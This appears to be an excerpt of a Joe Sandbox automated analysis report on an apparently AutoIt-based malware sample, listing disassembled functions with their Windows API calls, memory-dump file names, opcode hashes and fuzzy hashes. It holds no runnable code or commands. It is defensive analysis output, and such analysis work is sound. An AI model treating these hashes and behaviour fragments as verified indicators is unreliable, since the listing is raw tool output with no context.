                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                  • Opcode ID: c10c91b3fa0fc40244b3c7aaeb7062c394cb8d601924ee56d1b320ac268be549
                                                                                                                                  • Instruction ID: 606df57fdd61c3fa793db0f8fdee721ebe9eadc714563c3850c1a6065e7ec17c
                                                                                                                                  • Opcode Fuzzy Hash: c10c91b3fa0fc40244b3c7aaeb7062c394cb8d601924ee56d1b320ac268be549
                                                                                                                                  • Instruction Fuzzy Hash: 48E04FB1500208EFDB205F70CC4C6AA3FE5FF4C351F118405FD4A97210DA749882AB50
                                                                                                                                  Function 00F1C0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                  • Opcode ID: 681ba02bf865d7e2c4b988ea3750359e5f5a4a3057d2fc202d8f50fcfabd6834
                                                                                                                                  • Instruction ID: ced23f0d2492bce00f4ffa7925e2a75ce020e81b8e22da1215837fff8cc25338
                                                                                                                                  • Opcode Fuzzy Hash: 681ba02bf865d7e2c4b988ea3750359e5f5a4a3057d2fc202d8f50fcfabd6834
                                                                                                                                  • Instruction Fuzzy Hash: DAE0BFB5500208EFDB105F70DC4C69A7FE5FB4C351F118415F94A97261DB7599429B50
                                                                                                                                  Function 00F22350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID: >$DEFINE
                                                                                                                                  • API String ID: 4104443479-1664449232
                                                                                                                                  • Opcode ID: 0466e114041ead11bcc67010a770abf82ee50c68b9a36df0af3bec3d76f8c0d3
                                                                                                                                  • Instruction ID: f53e936cef6be350629458ed6cd1411b30e1100444738ed1222f4a92bf23de85
                                                                                                                                  • Opcode Fuzzy Hash: 0466e114041ead11bcc67010a770abf82ee50c68b9a36df0af3bec3d76f8c0d3
                                                                                                                                  • Instruction Fuzzy Hash: 55127C71E0021ADFCF24CF58D890AADBBB1FF49324F29815AE855AB351D734AE81DB50
                                                                                                                                  Function 00EDEAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 00EDECA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContainedObject
                                                                                                                                  • String ID: AutoIt3GUI$Container
                                                                                                                                  • API String ID: 3565006973-3941886329
                                                                                                                                  • Opcode ID: 0297db239a67ef6779bc4e190e771ffe5c1af61bf9bf70476719a20ce6539b8c
                                                                                                                                  • Instruction ID: 5c92f778b86689cb3ed791233d792c6dceff8c569eb89c23072098f688eb6eb4
                                                                                                                                  • Opcode Fuzzy Hash: 0297db239a67ef6779bc4e190e771ffe5c1af61bf9bf70476719a20ce6539b8c
                                                                                                                                  • Instruction Fuzzy Hash: 019147706007019FDB14DF64C888A6ABBF5FF49714B24856EE94AEF391DB71E842CB60
                                                                                                                                  Function 00EEE704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA3BCF: _wcscpy.LIBCMT ref: 00EA3BF2
                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                  • __wcsnicmp.LIBCMT ref: 00EEE785
                                                                                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00EEE84E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                  • String ID: LPT
                                                                                                                                  • API String ID: 3222508074-1350329615
                                                                                                                                  • Opcode ID: a511b34b7ff908ab8b91221a022d44439a197fc874467a8358c64e7df44f94fa
                                                                                                                                  • Instruction ID: b6797beb59047fbc57cf316986e4b06a352621d142f632b1845b081173399ef0
                                                                                                                                  • Opcode Fuzzy Hash: a511b34b7ff908ab8b91221a022d44439a197fc874467a8358c64e7df44f94fa
                                                                                                                                  • Instruction Fuzzy Hash: 8D617E75A00219AFDB18DF99C991EAEB7F8EF09310F04506AF556BB390DB30AE40CB55
                                                                                                                                  Function 00EA1B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00EA1B83
                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00EA1B9C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                                                  • Opcode ID: 0b5293fb7734a42275cced3055970babead17ab7d881c6dcc2147d6159909cf5
                                                                                                                                  • Instruction ID: f4719912f52b8917ef426622c010e98710621909fb88a0e28595c58cd70fa687
                                                                                                                                  • Opcode Fuzzy Hash: 0b5293fb7734a42275cced3055970babead17ab7d881c6dcc2147d6159909cf5
                                                                                                                                  • Instruction Fuzzy Hash: 5A515771408749ABE720AF14D886BABBBECFF99354F41484DF2C8510A2EB71956CC763
                                                                                                                                  Function 00EECE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA417D: __fread_nolock.LIBCMT ref: 00EA419B
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EECF49
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EECF5C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscmp$__fread_nolock
                                                                                                                                  • String ID: FILE
                                                                                                                                  • API String ID: 4029003684-3121273764
                                                                                                                                  • Opcode ID: 1cbc537df0f123ac18684b151916d8351514f1a3158ded682e6ba40b7b7fa55d
                                                                                                                                  • Instruction ID: b764a23ddad0fcb76759ef1b7f82df80a3813f13812d2f109ccbc263c51db430
                                                                                                                                  • Opcode Fuzzy Hash: 1cbc537df0f123ac18684b151916d8351514f1a3158ded682e6ba40b7b7fa55d
                                                                                                                                  • Instruction Fuzzy Hash: CD41E272A00219BADF109BA4CC81FEF7BFAAF89714F101469F601BB191D771AA45CB50
                                                                                                                                  Function 00EC9AF3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EC889E: __getptd_noexit.LIBCMT ref: 00EC889E
                                                                                                                                  • __getbuf.LIBCMT ref: 00EC9B8A
                                                                                                                                  • __lseeki64.LIBCMT ref: 00EC9BFA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __getbuf__getptd_noexit__lseeki64
                                                                                                                                  • String ID: pM
                                                                                                                                  • API String ID: 3311320906-582843881
                                                                                                                                  • Opcode ID: 8c361bb5dfce8e1348c3845396a28c82dfae88b94a8ccc87279e4d55324547b1
                                                                                                                                  • Instruction ID: b5a7568d24b7a805e6840f08a95cc457a9612d3330dd80d69d82c3d70b54f2dc
                                                                                                                                  • Opcode Fuzzy Hash: 8c361bb5dfce8e1348c3845396a28c82dfae88b94a8ccc87279e4d55324547b1
                                                                                                                                  • Instruction Fuzzy Hash: 96414371400B05AED3348B28DA99FBAB7E4AF41334F04961DE4BAA72C2D776DC428B14
                                                                                                                                  Function 00F0A578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00F0A668
                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F0A67D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: '
                                                                                                                                  • API String ID: 3850602802-1997036262
                                                                                                                                  • Opcode ID: 17eeee94803ca97c640ea744e9ad2bcf87e6f8367de2620da52dc23f41968e7a
                                                                                                                                  • Instruction ID: 2a7dcd868c25c617236cbaf3676bc1969d39a5eba51676fa8b82dbfbf35f36fa
                                                                                                                                  • Opcode Fuzzy Hash: 17eeee94803ca97c640ea744e9ad2bcf87e6f8367de2620da52dc23f41968e7a
                                                                                                                                  • Instruction Fuzzy Hash: 65410775A003099FDB14CF68C981BEA7BB9FB09300F18016AE915EB381D771A941EFA1
                                                                                                                                  Function 00F09567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00F0961B
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F09657
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$DestroyMove
                                                                                                                                  • String ID: static
                                                                                                                                  • API String ID: 2139405536-2160076837
                                                                                                                                  • Opcode ID: 90b7721e87181fc0e395040319cdec3af6ac228c83ed092d354f2fb45222b446
                                                                                                                                  • Instruction ID: 2a50efd91c20700b1b6d886d672b29990d8a1b4f2b552dbf804fc9885b039728
                                                                                                                                  • Opcode Fuzzy Hash: 90b7721e87181fc0e395040319cdec3af6ac228c83ed092d354f2fb45222b446
                                                                                                                                  • Instruction Fuzzy Hash: 1A31BC31500604AEEB209F24DC80FFB77A8FF48764F109619F9A9C7191DA71AC81EB60
                                                                                                                                  Function 00EE5B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00EE5BE4
                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EE5C1F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                                  • Opcode ID: 2e1aa64cadff773d478cd24d973266817b178851d0edf55ae9c744a9dda67b98
                                                                                                                                  • Instruction ID: 07f52acfbdc664cf8af2e00f9320f400649d58ea37b43c09083572f99d696993
                                                                                                                                  • Opcode Fuzzy Hash: 2e1aa64cadff773d478cd24d973266817b178851d0edf55ae9c744a9dda67b98
                                                                                                                                  • Instruction Fuzzy Hash: 3F31C53350074DABDB248F9AD985BADFBF5AF0535CF28101DE985B61A0E7B09A44DB10
                                                                                                                                  Function 00EF6B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __snwprintf.LIBCMT ref: 00EF6BDD
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __snwprintf_memmove
                                                                                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                  • API String ID: 3506404897-2584243854
                                                                                                                                  • Opcode ID: 38b189ddbd05bd6763bffb9fffb4ebcf3452d84d913f1bccfa2615508e8011ed
                                                                                                                                  • Instruction ID: 4267227a84a0d3a1f49f59a64fc7c30225c25a97882a078db0ca9358ab3ec309
                                                                                                                                  • Opcode Fuzzy Hash: 38b189ddbd05bd6763bffb9fffb4ebcf3452d84d913f1bccfa2615508e8011ed
                                                                                                                                  • Instruction Fuzzy Hash: 02215E3160021CABCF11EFA4CC82EAEB7F5EF49740F105459F649BB181DA70EA56DB62
                                                                                                                                  Function 00F091DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F09269
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F09274
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: Combobox
                                                                                                                                  • API String ID: 3850602802-2096851135
                                                                                                                                  • Opcode ID: 55bf637b5b2feea54f8b62aca3b9b0c9234578d7b8bc6a764a80f2b42cf2a918
                                                                                                                                  • Instruction ID: 65f9b55bce669f2c613b1faf86f3912b6324ba4a02230d6245ecc462ca8ab973
                                                                                                                                  • Opcode Fuzzy Hash: 55bf637b5b2feea54f8b62aca3b9b0c9234578d7b8bc6a764a80f2b42cf2a918
                                                                                                                                  • Instruction Fuzzy Hash: 5F11B671704109BFEF21CE54DC81EEB375AEB893A4F104125F918972D1E6B5DC51BBA0
                                                                                                                                  Function 00F0970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EBC657
                                                                                                                                    • Part of subcall function 00EBC619: GetStockObject.GDI32(00000011), ref: 00EBC66B
                                                                                                                                    • Part of subcall function 00EBC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EBC675
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00F09775
                                                                                                                                  • GetSysColor.USER32(00000012), ref: 00F0978F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
